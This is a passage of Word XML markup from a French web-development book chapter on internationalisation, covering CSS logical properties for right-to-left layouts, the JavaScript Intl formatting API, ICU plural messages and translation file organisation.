                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>border-start-start-radius</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>39.3 Propriétés logiques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les propriétés logiques remplacent les directions physiques par des directions relatives au sens de lecture. La même feuille de style sert alors les deux sens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.126 — Six conversions utiles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Physique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="372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Logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Équivalent en RTL</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin-left</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3720"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin-inline-start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Marge à droite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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margin-right</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="372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margin-inline-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Marge à gauche</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>padding-top</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3720"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>padding-block-start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inchangé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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width</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="372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inline-size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Inchangé</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>text-align: left</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3720"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>text-align: start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aligné à droite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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border-top-left-radius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="372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border-start-start-radius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Coin opposé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mise en page qui fonctionne dans les deux sens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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline-start: 1rem;      /* gauche en LTR, droite en RTL */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline: 1.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-start: 3px solid var(--accent);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: start;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Icône directionnelle : retournée automatiquement */</w:t>
        <w:br/>
        <w:t>.chevron:dir(rtl) { transform: scaleX(-1); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="48" name="Picture 48"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f46.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.46 — Deux approches de la direction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">39.4 Formater avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>Intl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Intl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> du navigateur connaît les conventions de chaque locale. Elle évite d'écrire des formats à la main, qui seront faux pour la moitié de la planète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre formats, zéro calcul manuel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const date = new Date("2026-03-14T15:00:00Z");</w:t>
        <w:br/>
        <w:br/>
        <w:t>new Intl.DateTimeFormat("fr-FR", { dateStyle: "long" }).format(date);</w:t>
        <w:br/>
        <w:t>// « 14 mars 2026 »</w:t>
        <w:br/>
        <w:br/>
        <w:t>new Intl.DateTimeFormat("en-US", { dateStyle: "long" }).format(date);</w:t>
        <w:br/>
        <w:t>// "March 14, 2026"</w:t>
        <w:br/>
        <w:br/>
        <w:t>new Intl.NumberFormat("fr-FR", { style: "currency", currency: "EUR" })</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .format(1234.5);          // « 1 234,50 € » (espace insécable)</w:t>
        <w:br/>
        <w:br/>
        <w:t>new Intl.NumberFormat("de-DE").format(1234.5);   // "1.234,5"</w:t>
        <w:br/>
        <w:br/>
        <w:t>new Intl.RelativeTimeFormat("fr", { numeric: "auto" }).format(-2, "day");</w:t>
        <w:br/>
        <w:t>// « avant-hier »</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Tableau 0.127 — Six objets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Intl</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8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Objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Piège évité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DateTimeFormat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dates et heures</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Ordre jour/mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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NumberFormat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Nombres, devises, unités</w:t>
            </w:r>
          </w:p>
        </w:tc>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Séparateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RelativeTimeFormat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« il y a 3 jours »</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Pluriels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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PluralRules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Catégorie de pluriel</w:t>
            </w:r>
          </w:p>
        </w:tc>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Règles slaves, arabes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tri alphabétique</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Accents et ligatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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ListFormat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Énumérations</w:t>
            </w:r>
          </w:p>
        </w:tc>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 a, b et c »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux usages souvent oubliés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Trier correctement</w:t>
        <w:br/>
        <w:t>["écureuil", "elephant", "Étoile", "zèbre"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .sort(new Intl.Collator("fr").compare);</w:t>
        <w:br/>
        <w:t>// ["écureuil", "elephant", "Étoile", "zèbre"]</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Énumérer</w:t>
        <w:br/>
        <w:t>new Intl.ListFormat("fr", { style: "long", type: "conjunction" })</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .format(["CSS", "HTML", "JavaScript"]);</w:t>
        <w:br/>
        <w:t>// « CSS, HTML et JavaScript »</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>39.5 Traduire sans concaténer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Concaténer des fragments de phrase produit des traductions impossibles. Un message complet, avec des emplacements nommés, se traduit correctement dans toutes les langues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des messages complets, avec pluriels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À éviter : ordre des mots figé</w:t>
        <w:br/>
        <w:t>const message = "Bonjour " + prenom + ", vous avez " + n + " message" + (n &gt; 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ? "s" : "");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// À privilégier : message complet et paramétré</w:t>
        <w:br/>
        <w:t>const messages = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fr: {</w:t>
        <w:br/>
        <w:t>salutation: "Bonjour {prenom}, vous avez {n, plural, =0 {aucun message} one</w:t>
        <w:br/>
        <w:t xml:space="preserve">      {un message} other {# messages}}.",</w:t>
        <w:br/>
        <w:t>panier: "{n, plural, =0 {Votre panier est vide} one {Un article} other {#</w:t>
        <w:br/>
        <w:t xml:space="preserve">      articles}}",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  en: {</w:t>
        <w:br/>
        <w:t>salutation: "Hello {prenom}, you have {n, plural, =0 {no messages} one {one</w:t>
        <w:br/>
        <w:t xml:space="preserve">      message} other {# messages}}.",</w:t>
        <w:br/>
        <w:t>panier: "{n, plural, =0 {Your cart is empty} one {One item} other {# items}}",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le standard ICU MessageFormat décrit ces messages. Les bibliothèques de traduction l'implémentent ; à défaut, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Intl.PluralRules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de choisir la forme correcte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des règles de pluriel qui varient selon la langue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const regles = new Intl.PluralRules("pl");</w:t>
        <w:br/>
        <w:t>regles.select(1);   // "one"</w:t>
        <w:br/>
        <w:t>regles.select(2);   // "few"</w:t>
        <w:br/>
        <w:t>regles.select(5);   // "many"   — le polonais distingue plus de formes que le</w:t>
        <w:br/>
        <w:t xml:space="preserve">  français</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LE TEXTE TRADUIT CHANGE DE LONGUEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>L'allemand et le finnois allongent, le chinois raccourcit. Prévoyez 30 % de marge dans les boutons, les onglets et les libellés de formulaire, et testez avec la traduction la plus longue dès la conception.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>39.6 Organiser les traductions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier par langue, avec des clés stables et un espace de noms par écran. Les clés ne doivent jamais être les phrases elles-mêmes : une correction d'orthographe casserait toutes les traductions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une arborescence de traductions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locales/</w:t>
        <w:br/>
        <w:t>├── fr.json</w:t>
        <w:br/>
        <w:t>├── en.json</w:t>
        <w:br/>
        <w:t>└── ar.json</w:t>
        <w:br/>
        <w:br/>
        <w:t># fr.json</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
